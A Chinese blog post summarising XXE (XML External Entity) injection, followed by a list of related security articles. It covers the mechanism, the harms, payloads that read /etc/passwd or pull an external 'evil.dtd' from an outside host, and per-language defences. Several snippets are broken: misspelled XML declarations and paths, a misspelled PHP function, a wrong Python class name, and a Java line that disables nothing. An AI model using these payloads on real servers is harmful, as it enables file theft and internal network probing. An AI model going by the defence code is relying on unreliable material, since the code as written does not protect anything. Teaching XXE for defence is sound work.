XXE漏洞总结中

最新推荐文章于 2024-07-21 12:06:59 发布
最新推荐文章于 2024-07-21 12:06:59 发布
阅读量123 收藏
点赞数
分类专栏: 注入型漏洞 文章标签: 安全 web安全 xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MingShenfree/article/details/120992041
版权

XXE注入原理

        XXE(XML External Entity Injection)外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml2.9以前版本默认支持并开启对外部实体的引用,服务端解析用户提交的XML文件时,卫队XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://和ftp://等协议,导致可加载恶意外部文件和代码。

XXE注入危害

        任意文件读取

        命令执行

        内网端口扫描

        攻击内网网站

        Dos攻击等

XXE外部实体注入构造

        1,通过DTD外部实体声明

<?xml verision="1.0"?>
<DOCTYPE a[
    <!ENTITY b SYSTEM "file:///etc/passwd">
]>
<a>&b;</a>

        2,通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明

<?xml version="1.0"?>
<!DOCTYPE a [
    <!ENTITY b SYSTEM "http://mark4z5.com/evil.dtd">
]>
<a>&b;</a>

#而http://mark4z5.com/evil.dtd内容为
<!ENTITY b SYSTEM "file:///etc.passwd">

        3,通过DTD外部实体声明引入的外部DTD文档,再引入外部实体声明

<?xml version="1.0"?>
<!DOCTYPE a [
    <!ENTITY %b SYSTEM "http://mark4z5.com/evil.dtd">
]>
<a>%b</a>

        支持使用的协议

        

XXE注入攻击类型

        XXE任意文件读取

        Blind XXE

        端口扫描

        远程代码执行

XXE注入防御

        1,使用开发语言提供的禁用外部实体的方法
               

PHP:

libxml_diable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

Python:

from lxml import etree

xmlData = etree.parse(xmlSource,etree.XMLParse(resolve_entities=False))

        2,过滤用户提交的XML数据中的关键词

        

MingShenfree
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE漏洞
迷风小白
07-12 2799
0X00 什么是XXE XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 0X01 XML XML文档结构包括XML声明、DTD文档类型定义和文档元素信息 ...
xxe漏洞利用
qq_50673174的博客
05-30 1529
XXEXML External Entity)是指xml外部实体攻击漏洞XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
XXE漏洞总结
ma963852的博客
05-27 947
搬运:未知攻焉知防——XXE漏洞攻防 - 博客 - 腾讯安全应急响应心 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的元语言。 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义XML文档的合法构建模块。DTD可以再XML文档内部声明,也可以外部引用。 内部声明DTD <根元素[声明元素]> 引用外部DTD <根元素 SY
XXE漏洞简析
weixin_33708432的博客
05-16 847
0x00.什么是XXEXML外部实体注入(XML External Entity Injection) XML基础 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型. 是一种允许用户对自己的标记语言进行定义的源语言。 XML文档结构包括XML声明、DTD文档类型定义、文档元素。 DTD(文档类型定义)的作用是定义xml文档的合法构建模块。 DTD...
XXE漏洞详解
xcxhzjl的博客
11-18 2806
目录 一、XML基础 二、实体的分类 1、命名实体 2、字符实体 3、参数实体 4、外部实体 三、XXE漏洞 1、XXE漏洞发生在哪里 2、怎么判断网站存在XXE漏洞 3、XXE漏洞的危害 4、怎样构建XXE漏洞 5、XXE漏洞的防御 参考资料 XXE漏洞即外部实体注入攻击(XML External Entity)。 一、XML基础 XML(eXtensible Markup Language)是一种结构性标记语言,在格式上类似于HTML。可用来标记数据,定义...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
在本节课程,我们将讨论XXE漏洞的利用方法,特别是任意文件读取的实现。通过学习本节内容,您将掌握XXE漏洞的基本原理和利用方法,从而更好地保护自己的Web应用程序。 1. 测试代码介绍 在开始学习XXE漏洞利用...
XXE - 防御策略-01
09-15
三、XXE 漏洞防御总结 为了防御 XXE 漏洞,需要采取多种防御策略,包括禁用外部实体、过滤用户提交的 XML 数据 orazing Input Validation。同时,还需要保持软件和库的最新版本,避免使用旧版本的 libxml2 库。 ...
Web间件常见漏洞总结(免积分)
02-09
在本文,我们将深入探讨Web间件常见的安全漏洞,并提供相应的防范策略。 一、跨站脚本(XSS)攻击 XSS攻击是通过在网页注入恶意脚本来实现的,攻击者可以获取用户敏感信息,如登录凭据。防范XSS攻击的关键...
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
总结来说,XXE漏洞是由于XML解析器处理不当引起的,可能导致敏感数据泄露、内网扫描和命令执行等严重后果。因此,开发者应确保正确配置和限制XML解析器,避免使用不受信任的XML输入,并实施输入验证和过滤机制,以...
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 604
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
【ROS2】高级:安全-部署指南
最新发布
cxyhjl的博客
07-21 524
目标:了解将安全工件部署到生产系统时的最佳实践。教程级别:高级时间:20 分钟内容背景先决条件一般准则构建部署场景生成 Docker 镜像理解 compose 文件运行示例检查容器背景典型的部署场景通常涉及将容器化的应用程序或软件包发送到远程系统。在部署启用安全性的应用程序时应特别注意,要求用户考虑打包文件的敏感性。遵循 DDS 安全标准 https://www.omg.org/s...
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1214
区分不同的签名。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 496
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 634
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue安全最佳实践。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 897
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1110
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
从人工巡检到智能防控:智慧油气田安全生产的新视角
TSINGSEE青犀视频官方技术博客
07-18 1075
远程视频监控:支持7/24小时实时高清视频监控,视频画面1、4、9、16个可选,支持自定义视频轮播。
geoserver xxe漏洞
09-02
XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值